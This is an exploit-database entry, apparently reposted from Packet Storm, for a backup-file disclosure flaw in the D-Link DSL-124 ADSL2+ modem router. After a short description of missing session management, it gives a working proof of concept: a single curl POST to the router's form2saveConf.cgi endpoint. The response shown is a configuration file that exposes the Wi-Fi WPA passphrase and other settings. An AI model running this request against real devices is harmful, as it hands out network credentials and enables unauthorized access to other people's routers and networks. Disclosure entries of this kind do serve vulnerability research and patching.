Share
## https://sploitus.com/exploit?id=PACKETSTORM:171589
# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure  
# Date: 2022-11-10  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://www.dlink.com  
# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09  
# Firmware Version: ME_1.00  
# Tested on: Windows 11  
  
# [ Details - DSL-124 ]:  
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,  
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,  
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,  
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.  
  
# [ Description ]:  
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,  
#and in response to sending this request, she receives a complete backup of the router settings,  
#In fact this happens because of the lack of management of users and sessions in the network.  
  
# [ POC ]:  
  
Request :  
  
curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi  
  
Response :  
  
HTTP/1.1 200 OK  
Connection: close  
Server: Virtual Web 0.9  
Content-Type: application/octet-stream;  
Content-Disposition: attachment;filename="config.img"  
Pragma: no-cache  
Cache-Control: no-cache  
  
<Config_Information_File_8671>  
<V N="WLAN_WPA_PSK" V="pass@12345"/>  
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>  
<V N="WLAN_WPA_REKEY_TIME" V=""/>  
<V N="WLAN_ENABLE_1X" V="0x0"/>  
<V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>  
<V N="WLAN_RS_IP" V="0.0.0.0"/>  
.  
.  
.  
</Config_Information_File_8671>